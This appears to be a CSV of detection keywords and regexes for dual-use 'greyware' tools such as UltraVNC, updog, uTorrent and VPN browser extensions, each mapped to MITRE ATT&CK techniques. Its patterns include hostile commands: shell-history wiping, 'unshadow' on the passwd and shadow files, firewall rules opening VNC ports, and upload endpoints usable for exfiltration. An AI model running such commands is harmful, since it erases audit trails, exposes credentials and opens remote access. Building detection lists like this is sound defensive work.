"*firewall add allowedprogram *winvnc.exe* ENABLE ALL*",".{0,1000}firewall\sadd\sallowedprogram\s.{0,1000}winvnc\.exe.{0,1000}\sENABLE\sALL.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*firewall add portopening TCP 5800 vnc5800*",".{0,1000}firewall\sadd\sportopening\sTCP\s5800\svnc5800.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*firewall add portopening TCP 5900 vnc5900*",".{0,1000}firewall\sadd\sportopening\sTCP\s5900\svnc5900.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*HKCR\.vnc*",".{0,1000}HKCR\\\.vnc.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A"
"*Program Files (x86)\uvnc bvba\*",".{0,1000}Program\sFiles\s\(x86\)\\uvnc\sbvba\\.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*UltraVNC Launcher.lnk*",".{0,1000}UltraVNC\sLauncher\.lnk.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ultravnc mslogonacl*",".{0,1000}ultravnc\smslogonacl.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*UltraVNC Repeater.lnk*",".{0,1000}UltraVNC\sRepeater\.lnk.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*UltraVNC Server Settings.lnk*",".{0,1000}UltraVNC\sServer\sSettings\.lnk.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*UltraVNC Server.lnk*",".{0,1000}UltraVNC\sServer\.lnk.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ultravnc testauth*",".{0,1000}ultravnc\stestauth.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*UltraVNC Viewer.lnk*",".{0,1000}UltraVNC\sViewer\.lnk.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*UltraVNC_*_X86_Setup*",".{0,1000}UltraVNC_.{0,1000}_X86_Setup.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ULTRAVNC_1*_X86_SETUP.EXE-*.pf*",".{0,1000}ULTRAVNC_1.{0,1000}_X86_SETUP\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ultravnc_repeater*",".{0,1000}ultravnc_repeater.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ultravnc_server*",".{0,1000}ultravnc_server.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ultravnc_viewer*",".{0,1000}ultravnc_viewer.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*VNCviewer Config File*",".{0,1000}VNCviewer\sConfig\sFile.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry value","10","10","N/A","N/A","N/A","N/A"
"*VncViewer.Config*",".{0,1000}VncViewer\.Config.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A"
"*VNCVIEWER.EXE-*.pf*",".{0,1000}VNCVIEWER\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*WinVNC.exe*",".{0,1000}WinVNC\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*gbmdmipapolaohpinhblmcnpmmlgfgje*",".{0,1000}gbmdmipapolaohpinhblmcnpmmlgfgje.{0,1000}","greyware_tool_keyword","Unblock Websites","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*/uvs_v415eng.zip*",".{0,1000}\/uvs_v415eng\.zip.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\*\Doc_ENG\_Rootkit detection.txt*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\Doc_ENG\\_Rootkit\sdetection\.txt.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\Update_UVS.exe*",".{0,1000}\\Update_UVS\.exe.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\uvs_v415eng.zip*",".{0,1000}\\uvs_v415eng\.zip.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*dd90d845a111bc52b3d81dd597c5eaf0ef41d2278383a668f8932d8faefccbda*",".{0,1000}dd90d845a111bc52b3d81dd597c5eaf0ef41d2278383a668f8932d8faefccbda.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A"
"*http://dsrt.dyndns.org:8888/uvs_freeupdate_en.htm*",".{0,1000}http\:\/\/dsrt\.dyndns\.org\:8888\/uvs_freeupdate_en\.htm.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*http://dsrt.dyndns.org:8888/uvs_register_en.htm*",".{0,1000}http\:\/\/dsrt\.dyndns\.org\:8888\/uvs_register_en\.htm.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*PUA.Win32.uVirusSniffer.A*",".{0,1000}PUA\.Win32\.uVirusSniffer\.A.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","0","#Avsignature","N/A","8","10","N/A","N/A","N/A","N/A"
"*PUA:Win32/Packunwan*",".{0,1000}PUA\:Win32\/Packunwan.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","0","#Avsignature","N/A","8","10","N/A","N/A","N/A","N/A"
"*Universal.Virus.Sniffer.4.15.zip*",".{0,1000}Universal\.Virus\.Sniffer\.4\.15\.zip.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*Win32/UniversalVirusSniffer*",".{0,1000}Win32\/UniversalVirusSniffer.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","0","#Avsignature","N/A","8","10","N/A","N/A","N/A","N/A"
"*higioemojdadgdbhbbbkfbebbdlfjbip*",".{0,1000}higioemojdadgdbhbbbkfbebbdlfjbip.{0,1000}","greyware_tool_keyword","Unlimited VPN & Proxy by ibVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE*",".{0,1000}unset\sHISTFILE\s\&\&\sHISTSIZE\=0\s\&\&\srm\s\-f\s\$HISTFILE\s\&\&\sunset\sHISTFILE.{0,1000}","greyware_tool_keyword","unset","disable history logging","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","N/A","10","8","751","265","2024-08-12T21:40:40Z","2021-09-08T20:33:18Z"
"*unset HISTFILE*",".{0,1000}unset\sHISTFILE.{0,1000}","greyware_tool_keyword","unset","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*unshadow passwd shadow > *",".{0,1000}unshadow\spasswd\sshadow\s\>\s.{0,1000}","greyware_tool_keyword","unshadow","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*/updog-*.tar.gz*",".{0,1000}\/updog\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","1","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z"
"*/updog.git*",".{0,1000}\/updog\.git.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","1","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z"
"*/updog/archive/updog-*",".{0,1000}\/updog\/archive\/updog\-.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","1","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z"
"*\updog-master\*",".{0,1000}\\updog\-master\\.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","0","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z"
"*pip* install updog*",".{0,1000}pip.{0,1000}\sinstall\supdog.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","0","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z"
"*sc0tfree/updog*",".{0,1000}sc0tfree\/updog.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","1","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z"
"*updog --*",".{0,1000}updog\s\-\-.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","0","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z"
"*updog -d /*",".{0,1000}updog\s\-d\s\/.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","0","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z"
"*updog -p *",".{0,1000}updog\s\-p\s.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","0","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z"
"*updog-master.zip*",".{0,1000}updog\-master\.zip.{0,1000}","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/sc0tfree/updog","1","1","N/A","N/A","9","10","2914","300","2024-03-13T15:52:39Z","2020-02-18T15:29:21Z"
"*bniikohfmajhdcffljgfeiklcbgffppl*",".{0,1000}bniikohfmajhdcffljgfeiklcbgffppl.{0,1000}","greyware_tool_keyword","Upnet","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*eppiocemhmnlbhjplcgkofciiegomcon*",".{0,1000}eppiocemhmnlbhjplcgkofciiegomcon.{0,1000}","greyware_tool_keyword","Urban Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*almalgbpmcfpdaopimbdchdliminoign*",".{0,1000}almalgbpmcfpdaopimbdchdliminoign.{0,1000}","greyware_tool_keyword","Urban Shield","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*https://usaupload.com/account/ajax/load_files*",".{0,1000}https\:\/\/usaupload\.com\/account\/ajax\/load_files.{0,1000}","greyware_tool_keyword","usaupload","uploading files to usaupload","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://usaupload.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://usaupload.com/account/ajax/uploader*",".{0,1000}https\:\/\/usaupload\.com\/account\/ajax\/uploader.{0,1000}","greyware_tool_keyword","usaupload","uploading files to usaupload","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://usaupload.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\uTorrent\*",".{0,1000}\\uTorrent\\.{0,1000}","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*\utweb.exe*",".{0,1000}\\utweb\.exe.{0,1000}","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*AppData\Roaming\uTorrent*",".{0,1000}AppData\\Roaming\\uTorrent.{0,1000}","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*uTorrent (1).exe*",".{0,1000}uTorrent\s\(1\)\.exe.{0,1000}","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*uTorrent.exe*",".{0,1000}uTorrent\.exe.{0,1000}","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*utorrent_installer.exe*",".{0,1000}utorrent_installer\.exe.{0,1000}","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*utweb_installer.exe*",".{0,1000}utweb_installer\.exe.{0,1000}","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*lejgfmmlngaigdmmikblappdafcmkndb*",".{0,1000}lejgfmmlngaigdmmikblappdafcmkndb.{0,1000}","greyware_tool_keyword","uVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*bnijmipndnicefcdbhgcjoognndbgkep*",".{0,1000}bnijmipndnicefcdbhgcjoognndbgkep.{0,1000}","greyware_tool_keyword","Veee","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*aojlhgbkmkahabcmcpifbolnoichfeep*",".{0,1000}aojlhgbkmkahabcmcpifbolnoichfeep.{0,1000}","greyware_tool_keyword","VirtualShield VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*>RealVNC<*",".{0,1000}\>RealVNC\<.{0,1000}","greyware_tool_keyword","vncviewer","VNCViewer is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>UltraVNC VNCViewer<*",".{0,1000}\>UltraVNC\sVNCViewer\<.{0,1000}","greyware_tool_keyword","vncviewer","VNCViewer is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ProgramData\JWrapper-Remote Access\*.exe*",".{0,1000}ProgramData\\JWrapper\-Remote\sAccess\\.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","vncviewer","SimpleHelp or VNCViewer is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","simple-help.com","1","0","N/A","could be used by VNCViewer or SimpleHelp","10","10","N/A","N/A","N/A","N/A"
"*RealVNC.VNCViewer*",".{0,1000}RealVNC\.VNCViewer.{0,1000}","greyware_tool_keyword","vncviewer","VNCViewer is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
